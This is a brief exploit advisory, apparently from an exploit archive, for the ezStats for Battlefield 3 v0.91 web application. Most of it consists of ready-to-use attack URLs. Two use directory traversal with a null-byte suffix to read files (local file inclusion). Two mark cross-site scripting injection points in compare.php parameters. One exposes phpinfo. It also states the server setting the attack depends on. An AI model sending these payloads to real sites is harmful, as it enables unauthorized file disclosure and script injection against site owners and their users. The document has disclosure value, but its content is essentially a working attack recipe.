Web Battlefield 3 0.91 XSS / Local File Inclusion

[DarckSol]

ezStats for Battlefield 3 version 0.91 suffers from cross site scripting and local file inclusion vulnerabilities.

#################################################
### Exploit Title: ezStats for Battlefield 3 v0.91 Multiple Vulnerabilities
### Date: 02/05/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.ezstats.org/
### Software Link: http://ezstats.googlecode.com/files/ezStats2_BF3_v0.91.zip
### Tested on: Linux/Windows 
#################################################

1- Local File Inclusion :

http://127.0.0.1/ezStats2/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

http://127.0.0.1/ezStats2/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

2- XSS :

http://127.0.0.1/ezStats2/compare.php?common=[XSS]

http://127.0.0.1/ezStats2/compare.php?rankings=[XSS]

############################################

# Notes :

1- Must be magic_quotes_gpc = Off

2- phpinfo() :

http://127.0.0.1/ezStats2/admin/apitest.php?info

# Greetz to my friendz